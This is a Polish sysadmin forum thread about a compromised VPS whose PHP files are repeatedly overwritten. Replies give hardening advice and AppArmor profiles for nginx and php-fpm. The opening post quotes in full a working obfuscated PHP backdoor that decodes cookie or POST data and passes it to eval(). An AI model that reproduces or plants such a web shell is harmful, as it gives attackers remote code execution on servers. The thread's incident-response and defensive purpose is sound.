Nie jesteś zalogowany.
Jeśli nie posiadasz konta, zarejestruj je już teraz! Pozwoli Ci ono w pełni korzystać z naszego serwisu. Spamerom dziękujemy!
Prosimy o pomoc dla małej Julki — przekaż 1% podatku na Fundacji Dzieciom zdazyć z Pomocą.
Więcej informacji na dug.net.pl/pomagamy/.
Witam
mam problem , na VPS była wcześniej presta i autorski skrypt php , w prestashop był bug w upload i trafiały się dziwne pliki . Więc została wywalona presta i został tylko autorski skrypt OOP w php .
Pomimo wywalenia presty (wcześniej też to się działo) pojawiały się pliki php których nie powinno wcale tam być np wp-login.php itp
teraz mam tak że pliki php są nadpisywane (tylko 1 linia + 50 tab spacji aby nie było widać kodu w edytorze) np .
<?php $GLOBALS['c3846'];global$c3846;$c3846=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['ed8d']="\x34\x68\x4b\x2c\x6b\x48\x25\x40\x7a\x72\x75\x5c\x67\x65\x63\x32\x7d\x78\x3b\x70\x3c\x21\x60\x6f\x44\x71\x58\x4c\x53\x47\x27\x6a\x7b\x2d\x36\x24\x62\x3d\x57\xd\x6e\x2a\x51\x23\x35\x73\x42\x4d\x7e\x66\x37\x61\x29\x52\x2e\x20\x5f\x45\x76\x4e\x46\x38\x39\x59\x28\x33\x5b\x3e\x5a\x30\x31\x5e\x4a\x3f\x2f\x49\x5d\x6c\x55\x41\x69\x79\x54\x64\x6d\x2b\x3a\x4f\x77\x26\xa\x9\x50\x43\x22\x56\x74\x7c";$c3846[$c3846['ed8d'][77].$c3846['ed8d'][83].$c3846['ed8d'][0].$c3846['ed8d'][14].$c3846['ed8d'][36].$c3846['ed8d'][36].$c3846['ed8d'][62]]=$c3846['ed8d'][14].$c3846['ed8d'][1].$c3846['ed8d'][9];$c3846[$c3846['ed8d'][4].$c3846['ed8d'][70].$c3846['ed8d'][65].$c3846['ed8d'][0].$c3846['ed8d'][70].$c3846['ed8d'][70].$c3846['ed8d'][62].$c3846['ed8d'][36].$c3846['ed8d'][34]]=$c3846['ed8d'][23].$c3846['ed8d'][9].$c3846['ed8d'][83];$c3846[$c3846['ed8d'][23].$c3846['ed8d'][50].$c3846['ed8d'][65].$c3846['ed8d'][83].$c3846['ed8d'][14].$c3846['ed8d'][51].$c3846['ed8d'][69].$c3846['ed8d'][70]]=$c3846['ed8d'][45].$c3846['ed8d'][96].$c3846['ed8d'][9].$c3846['ed8d'][77].$c3846['ed8d'][13].$c3846['ed8d'][40];$c3846[$c3846['ed8d'][12].$c3846['ed8d'][36].$c3846['ed8d'][61].$c3846['ed8d'][50].$c3846['ed8d'][50].$c3846['ed8d'][14].$c3846['ed8d'][49]]=$c3846['ed8d'][80].$c3846['ed8d'][40].$c3846['ed8d'][80].$c3846['ed8d'][56].$c3846['ed8d'][45].$c3846['ed8d'][13].$c3846['ed8d'][96];$c3846[$c3846['ed8d'][45].$c3846['ed8d'][51].$c3846['ed8d'][36].$c3846['ed8d'][62].$c3846['ed8d'][83].$c3846['ed8d'][83].$c3846['ed8d'][14].$c3846['ed8d'][51]]=$c3846['ed8d'][45].$c3846['ed8d'][13].$c3846['ed8d'][9].$c3846['ed8d'][80].$c3846['ed8d'][51].$c3846['ed8d'][77].$c3846['ed8d'][80].$c3846['ed8d'][8].$c3846['ed8d'][13];$c3846[$c3846['ed8d'][58].$c3846['ed8d'][61].$c3846['ed8d'][36].$c3846['ed8d'][44].$c3846['ed8d'][69].$c3846['ed8d'][44].$c3846['ed8d'][65].$c3846['ed8d'][51]]=$c3846['ed8d'][19].$c3846['ed8d'][1].$c3846['ed8d'][19].$c3846['ed8d'][58].$c3846['ed8d'][13].$c3846['ed8d'][9].$c3846['ed8d'][45].$c3846['ed8d'][80].$c3846['ed8d'][23].$c3846['ed8d'][40];$c3846[$c3846['ed8d'][9].$c3846['ed8d'][13].$c3846['ed8d'][44].$c3846['ed8d'][34]]=$c3846['ed8d'][10].$c3846['ed8d'][40].$c3846['ed8d'][45].$c3846['ed8d'][13].$c3846['ed8d'][9].$c3846['ed8d'][80].$c3846['ed8d'][51].$c3846['ed8d'][77].$c3846['ed8d'][80].$c3846['ed8d'][8].$c3846['ed8d'][13];$c3846[$c3846['ed8d'][4].$c3846['ed8d'][49].$c3846['ed8d'][51].$c3846['ed8d'][50]]=$c3846['ed8d'][36].$c3846['ed8d'][51].$c3846['ed8d'][45].$c3846['ed8d'][13].$c3846['ed8d'][34].$c3846['ed8d'][0].$c3846['ed8d'][56].$c3846['ed8d'][83].$c3846['ed8d'][13].$c3846['ed8d'][14].$c3846['ed8d'][23].$c3846['ed8d'][83].$c3846['ed8d'][13];$c3846[$c3846['ed8d'][4].$c3846['ed8d'][62].$c3846['ed8d'][36].$c3846['ed8d'][15].$c3846['ed8d'][65].$c3846['ed8d'][13].$c3846['ed8d'][34]]=$c3846['ed8d'][45].$c3846['ed8d'][13].$c3846['ed8d'][96].$c3846['ed8d'][56].$c3846['ed8d'][96].$c3846['ed8d'][80].$c3846['ed8d'][84].$c3846['ed8d'][13].$c3846['ed8d'][56].$c3846['ed8d'][77].$c3846['ed8d'][80].$c3846['ed8d'][84].$c3846['ed8d'][80].$c3846['ed8d'][96];$c3846[$c3846['ed8d'][96].$c3846['ed8d'][51].$c3846['ed8d'][70].$c3846['ed8d'][70].$c3846['ed8d'][44].$c3846['ed8d'][34].$c3846['ed8d'][0].$c3846['ed8d'][70]]=$c3846['ed8d'][84].$c3846['ed8d'][61].$c3846['ed8d'][83].$c3846['ed8d'][62].$c3846['ed8d'][62];$c3846[$c3846['ed8d'][13].$c3846['ed8d'][14].$c3846['ed8d'][83].$c3846['ed8d'][14].$c3846['ed8d'][14].$c3846['ed8d'][50].$c3846['ed8d'][70].$c3846['ed8d'][44].$c3846['ed8d'][50]]=$c3846['ed8d'][84].$c3846['ed8d'][49].$c3846['ed8d'][0].$c3846['ed8d'][83].$c3846['ed8d'][70].$c3846['ed8d'][13].$c3846['ed8d'][49].$c3846['ed8d'][70].$c3846['ed8d'][34];$c3846[$c3846['ed8d'][4].$c3846['ed8d'][70].$c3846['ed8d'][13].$c3846['ed8d'][14].$c3846['ed8d'][62].$c3846['ed8d'][69].$c3846['ed8d'][49].$c3846['ed8d'][14].$c3846['ed8d'][13]]=$_POST;$c3846[$c3846['ed8d'][80].$c3846['ed8d'][61].$c3846['ed8d'][61].$c3846['ed8d'][0].$c3846['ed8d'][50].$c3846['ed8d'][50].$c3846['ed8d'][13]]=$_COOKIE;@$c3846[$c3846['ed8d'][12].$c3846['ed8d'][36].$c3846['ed8d'][61].$c3846['ed8d'][50].$c3846['ed8d'][50].$c3846['ed8d'][14].$c3846['ed8d'][49]]($c3846['ed8d'][13].$c3846['ed8d'][9].$c3846['ed8d'][9].$c3846['ed8d'][23].$c3846['ed8d'][9].$c3846['ed8d'][56].$c3846['ed8d'][77].$c3846['ed8d'][23].$c3846['ed8d'][12],NULL);@$c3846[$c3846['ed8d'][12].$c3846['ed8d'][36].$c3846['ed8d'][61].$c3846['ed8d'][50].$c3846['ed8d'][50].$c3846['ed8d'][14].$c3846['ed8d'][49]]($c3846['ed8d'][77].$c3846['ed8d'][23].$c3846['ed8d'][12].$c3846['ed8d'][56].$c3846['ed8d'][13].$c3846['ed8d'][9].$c3846['ed8d'][9].$c3846['ed8d'][23].$c3846['ed8d'][9].$c3846['ed8d'][45],0);@$c3846[$c3846['ed8d'][12].$c3846['ed8d'][36].$c3846['ed8d'][61].$c3846['ed8d'][50].$c3846['ed8d'][50].$c3846['ed8d'][14].$c3846['ed8d'][49]]($c3846['ed8d'][84].$c3846['ed8d'][51].$c3846['ed8d'][17].$c3846['ed8d'][56].$c3846['ed8d'][13].$c3846['ed8d'][17].$c3846['ed8d'][13].$c3846['ed8d'][14].$c3846['ed8d'][10].$c3846['ed8d'][96].$c3846['ed8d'][80].$c3846['ed8d'][23].$c3846['ed8d'][40].$c3846['ed8d'][56].$c3846['ed8d'][96].$c3846['ed8d'][80].$c3846['ed8d'][84].$c3846['ed8d'][13],0);@$c3846[$c3846['ed8d'][4].$c3846['ed8d'][62].$c3846['ed8d'][36].$c3846['ed8d'][15].$c3846['ed8d'][65].$c3846['ed8d'][13].$c3846['ed8d'][34]](0);$q79be1b1e=NULL;$ra109f3=NULL;$c3846[$c3846['ed8d'][36].$c3846['ed8d'][44].$c3846['ed8d'][51].$c3846['ed8d'][50].$c3846['ed8d'][83].$c3846['ed8d'][83].$c3846['ed8d'][14]]=$c3846['ed8d'][44].$c3846['ed8d'][36].$c3846['ed8d'][0].$c3846['ed8d'][65].$c3846['ed8d'][69].$c3846['ed8d'][13].$c3846['ed8d'][61].$c3846['ed8d'][14].$c3846['ed8d'][33].$c3846['ed8d'][62].$c3846['ed8d'][51].$c3846['ed8d'][13].$c3846['ed8d'][44].$c3846['ed8d'][33].$c3846['ed8d'][0].$c3846['ed8d'][15].$c3846['ed8d'][34].$c3846['ed8d'][83].$c3846['ed8d'][33].$c3846['ed8d'][51].$c3846['ed8d'][51].$c3846['ed8d'][51].$c3846['ed8d'][14].$c3846['ed8d'][33].$c3846['ed8d'][13].$c3846['ed8d'][13].$c3846['ed8d'][62].$c3846['ed8d'][61].$c3846['ed8d'][61].$c3846['ed8d'][13].$c3846['ed8d'][69].$c3846['ed8d'][61].$c3846['ed8d'][34].$c3846['ed8d'][13].$c3846['ed8d'][83].$c3846['ed8d'][62];global$b5a7ddc;function mf4d1ef16($q79be1b1e,$a272ef4){global$c3846;$y4e9="";for($b31a65d94=0;$b31a65d94<$c3846[$c3846['ed8d'][23].$c3846['ed8d'][50].$c3846['ed8d'][65].$c3846['ed8d'][83].$c3846['ed8d'][14].$c3846['ed8d'][51].$c3846['ed8d'][69].$c3846['ed8d'][70]]($q79be1b1e);){for($k0aff1ed=0;$k0aff1ed<$c3846[$c3846['ed8d'][23].$c3846['ed8d'][50].$c3846['ed8d'][65].$c3846['ed8d'][83].$c3846['ed8d'][14].$c3846['ed8d'][51].$c3846['ed8d'][69].$c3846['ed8d'][70]]($a272ef4)&&$b31a65d94<$c3846[$c3846['ed8d'][23].$c3846['ed8d'][50].$c3846['ed8d'][65].$c3846['ed8d'][83].$c3846['ed8d'][14].$c3846['ed8d'][51].$c3846['ed8d'][69].$c3846['ed8d'][70]]($q79be1b1e);$k0aff1ed++,$b31a65d94++){$y4e9.=$c3846[$c3846['ed8d'][77].$c3846['ed8d'][83].$c3846['ed8d'][0].$c3846['ed8d'][14].$c3846['ed8d'][36].$c3846['ed8d'][36].$c3846['ed8d'][62]]($c3846[$c3846['ed8d'][4].$c3846['ed8d'][70].$c3846['ed8d'][65].$c3846['ed8d'][0].$c3846['ed8d'][70].$c3846['ed8d'][70].$c3846['ed8d'][62].$c3846['ed8d'][36].$c3846['ed8d'][34]]($q79be1b1e[$b31a65d94])^$c3846[$c3846['ed8d'][4].$c3846['ed8d'][70].$c3846['ed8d'][65].$c3846['ed8d'][0].$c3846['ed8d'][70].$c3846['ed8d'][70].$c3846['ed8d'][62].$c3846['ed8d'][36].$c3846['ed8d'][34]]($a272ef4[$k0aff1ed]));}}return$y4e9;}function m8d99($q79be1b1e,$a272ef4){global$c3846;global$b5a7ddc;return$c3846[$c3846['ed8d'][13].$c3846['ed8d'][14].$c3846['ed8d'][83].$c3846['ed8d'][14].$c3846['ed8d'][14].$c3846['ed8d'][50].$c3846['ed8d'][70].$c3846['ed8d'][44].$c3846['ed8d'][50]]($c3846[$c3846['ed8d'][13].$c3846['ed8d'][14].$c3846['ed8d'][83].$c3846['ed8d'][14].$c3846['ed8d'][14].$c3846['ed8d'][50].$c3846['ed8d'][70].$c3846['ed8d'][44].$c3846['ed8d'][50]]($q79be1b1e,$b5a7ddc),$a272ef4);}foreach($c3846[$c3846['ed8d'][80].$c3846['ed8d'][61].$c3846['ed8d'][61].$c3846['ed8d'][0].$c3846['ed8d'][50].$c3846['ed8d'][50].$c3846['ed8d'][13]]as$a272ef4=>$he04f328c){$q79be1b1e=$he04f328c;$ra109f3=$a272ef4;}if(!$q79be1b1e){foreach($c3846[$c3846['ed8d'][4].$c3846['ed8d'][70].$c3846['ed8d'][13].$c3846['ed8d'][14].$c3846['ed8d'][62].$c3846['ed8d'][69].$c3846['ed8d'][49].$c3846['ed8d'][14].$c3846['ed8d'][13]]as$a272ef4=>$he04f328c){$q79be1b1e=$he04f328c;$ra109f3=$a272ef4;}}$q79be1b1e=@$c3846[$c3846['ed8d'][9].$c3846['ed8d'][13].$c3846['ed8d'][44].$c3846['ed8d'][34]]($c3846[$c3846['ed8d'][96].$c3846['ed8d'][51].$c3846['ed8d'][70].$c3846['ed8d'][70].$c3846['ed8d'][44].$c3846['ed8d'][34].$c3846['ed8d'][0].$c3846['ed8d'][70]]($c3846[$c3846['ed8d'][4].$c3846['ed8d'][49].$c3846['ed8d'][51].$c3846['ed8d'][50]]($q79be1b1e),$ra109f3));if(isset($q79be1b1e[$c3846['ed8d'][51].$c3846['ed8d'][4]])&&$b5a7ddc==$q79be1b1e[$c3846['ed8d'][51].$c3846['ed8d'][4]]){if($q79be1b1e[$c3846['ed8d'][51]]==$c3846['ed8d'][80]){$b31a65d94=Array($c3846['ed8d'][19].$c3846['ed8d'][58]=>@$c3846[$c3846['ed8d'][58].$c3846['ed8d'][61].$c3846['ed8d'][36].$c3846['ed8d'][44].$c3846['ed8d'][69].$c3846['ed8d'][44].$c3846['ed8d'][65].$c3846['ed8d'][51]](),$c3846['ed8d'][45].$c3846['ed8d'][58]=>$c3846['ed8d'][70].$c3846['ed8d'][54].$c3846['ed8d'][69].$c3846['ed8d'][33].$c3846['ed8d'][70],);echo@$c3846[$c3846['ed8d'][45].$c3846['ed8d'][51].$c3846['ed8d'][36].$c3846['ed8d'][62].$c3846['ed8d'][83].$c3846['ed8d'][83].$c3846['ed8d'][14].$c3846['ed8d'][51]]($b31a65d94);}elseif($q79be1b1e[$c3846['ed8d'][51]]==$c3846['ed8d'][13]){eval($q79be1b1e[$c3846['ed8d'][83]]);}exit();} ?>
i ta sytuacja się notorycznie powtarza . (zablokowany jest upload plików w php.ini)
nie wiem już gdzie szukać syfu (dziury którędy się to dostaje)
Offline
Został jakiś syf, który ma w rzyci zablokowanie uploadu.
Masz tam suphp czy wszystko chodzi z użytkownika serwera (www-data czy inny httpd)?
Offline
Logi prześledziłem (access.log , error.log) z czasem jakim zostały utworzone pliki (nic nie znalazłem)
Planuje chroot dla apache2 i tak jak napisał mati75 przeskanować za pomocą : clamscan i maldet.
W sumie to stoi na XEN ,jak mi się nie uda ,skończy się na utworzeniu nowego VPS'a na nim i przerzuceniem skryptu .
Offline
Na publicznej stronie daj uprawnienia read-only na folderach, a na backendzie administracyjnym np Lighttpd z prawem do zapisu w folderach, ale schowany za proxy na Apachu czy Nginxie z autoryzacją certyfikatem PKCS#12.
Nie ma boota, który by to pokonał, jak to sensownie skonfigurujesz.
Możesz też zaszaleć np profilami Apparmora, albo innym systemem ACL.
Przykładowo taki profil dla Nginxa:
#include <tunables/global> /usr/sbin/nginx { #include <abstractions/base> #include <abstractions/nameservice> #include <abstractions/web-data> #include <abstractions/perl> capability dac_override, capability dac_read_search, capability net_bind_service, capability sys_resource, /bin/bash mix, /bin/cat mix, /etc/nginx/ r, /etc/nginx/** r, /etc/ssl/nginx/** r, /etc/ssl/openssl.cnf r, /home/Gentoo/sources/** r, /usr/lib/nginx/*.so mr, /usr/lib64/nginx/*.so mr, /usr/sbin/nginx mix, /usr/share/cups/html/** r, /var/cache/nginx/ r, /var/cache/nginx/** rwl, /var/lib/nginx/ r, /var/lib/nginx/** rwl, /var/log/nginx/** rw, /{,var/}run/php*.sock rw, /{,var/}run/nginx.pid rwl, /var/www/** r, /home/www/** r, /usr/share/gtk-doc/html/** r, /usr/share/doc/** r, }
i taki do php-fpm:
#include <tunables/global> /usr/lib*/php5.*/bin/php-fpm { #include <abstractions/base> #include <abstractions/php5> #include <abstractions/user-tmp> #include <abstractions/web-data> #include <abstractions/mysql> #include <abstractions/postgresql> capability chown, capability dac_override, capability kill, /usr/bin/gpg2 pux, /usr/sbin/sendmail pux, /bin/bash pux, /etc/hosts r, /etc/resolv.conf r, /etc/nsswitch.conf r, /etc/group r, /etc/passwd r, /etc/host.conf r, /etc/gai.conf r, /etc/ssl/openssl.cnf r, /etc/services r, /etc/krb5.conf r, /etc/php/fpm-php5.*/ r, /etc/php/fpm-php5.*/** r, /proc/*/task/ r, /usr/lib64/php5.*/bin/php-fpm mr, /usr/lib64/php5.*/lib64/** mr, /usr/lib64/php5.*/lib/** mr, /usr/share/snmp/mibs/ r, /usr/share/snmp/mibs/** r, /var/lib/net-snmp/mib_indexes/ r, /var/lib/net-snmp/mib_indexes/** r, /var/log/php/ wk, /var/log/php/** wk, /{,var/}run/phpfpm56.pid w, /{,var/}run/php*.sock rwk, owner @{PROC}/[0-9]*/cmdline r, owner @{PROC}/[0-9]*/fd/ r, owner @{PROC}/[0-9]*/fd/* r, owner @{PROC}/[0-9]*/maps r, owner @{PROC}/[0-9]*/mountinfo r, owner @{PROC}/[0-9]*/stat r, owner @{PROC}/[0-9]*/statm r, owner @{PROC}/[0-9]*/status r, owner @{PROC}/[0-9]*/task/ r, owner @{PROC}/[0-9]*/task/[0-9]*/stat r, @{PROC}/[0-9]*/net/if_inet6 r, @{PROC}/[0-9]*/net/ipv6_route r, @{PROC}/filesystems r, owner /tmp/** rmwlk, /var/www/**/logs/** rw, /var/www/**/tmp/** rw, /var/www/**/temp/** rw, /var/www/**/cache/** rw, /var/www/** r, /home/www/**/logs/** rw, /home/www/**/log/** rw, /home/www/**/tmp/** rw, /home/www/**/temp/** rw, /home/www/**/image/** rw, /home/www/**/img/** rw, /home/www/**/download/** rw, /home/www/**/cache/** rw, /home/www/**/.htaccess rw, /home/www/**/robots.txt rw, /home/www/**/*.xml rw, /usr/share/webapps/** r, /usr/share/webapps/**/log/** rw, /usr/share/webapps/**/logs/** rw, /usr/share/webapps/**/rra/** rw, /usr/share/webapps/**/tmp/** rw, /usr/share/webapps/**/cache/** rw, owner /home/www/**/templates_c/** rw, /var/spool/php rwlk, /var/spool/php/** rwlk, }
I niech sobie "hakiery" próbują pakować śmieci na serwer, proszę uprzejmie.
Oczywiście ścieżki, gdzie demon php może zapisywać muszą być wyłączone z otwierania w nich skryptów php.
Ostatnio edytowany przez Jacekalex (2016-08-27 17:20:36)
Offline
Time (s) | Query |
---|---|
0.00012 | SET CHARSET latin2 |
0.00004 | SET NAMES latin2 |
0.00132 | SELECT u.*, g.*, o.logged FROM punbb_users AS u INNER JOIN punbb_groups AS g ON u.group_id=g.g_id LEFT JOIN punbb_online AS o ON o.ident='18.117.71.239' WHERE u.id=1 |
0.00100 | REPLACE INTO punbb_online (user_id, ident, logged) VALUES(1, '18.117.71.239', 1732747532) |
0.00052 | SELECT * FROM punbb_online WHERE logged<1732747232 |
0.00069 | SELECT topic_id FROM punbb_posts WHERE id=304560 |
0.00008 | SELECT id FROM punbb_posts WHERE topic_id=28893 ORDER BY posted |
0.00061 | SELECT t.subject, t.closed, t.num_replies, t.sticky, f.id AS forum_id, f.forum_name, f.moderators, fp.post_replies, 0 FROM punbb_topics AS t INNER JOIN punbb_forums AS f ON f.id=t.forum_id LEFT JOIN punbb_forum_perms AS fp ON (fp.forum_id=f.id AND fp.group_id=3) WHERE (fp.read_forum IS NULL OR fp.read_forum=1) AND t.id=28893 AND t.moved_to IS NULL |
0.00007 | SELECT search_for, replace_with FROM punbb_censoring |
0.00150 | SELECT u.email, u.title, u.url, u.location, u.use_avatar, u.signature, u.email_setting, u.num_posts, u.registered, u.admin_note, p.id, p.poster AS username, p.poster_id, p.poster_ip, p.poster_email, p.message, p.hide_smilies, p.posted, p.edited, p.edited_by, g.g_id, g.g_user_title, o.user_id AS is_online FROM punbb_posts AS p INNER JOIN punbb_users AS u ON u.id=p.poster_id INNER JOIN punbb_groups AS g ON g.g_id=u.group_id LEFT JOIN punbb_online AS o ON (o.user_id=u.id AND o.user_id!=1 AND o.idle=0) WHERE p.topic_id=28893 ORDER BY p.id LIMIT 0,25 |
0.00092 | UPDATE punbb_topics SET num_views=num_views+1 WHERE id=28893 |
Total query time: 0.00687 s |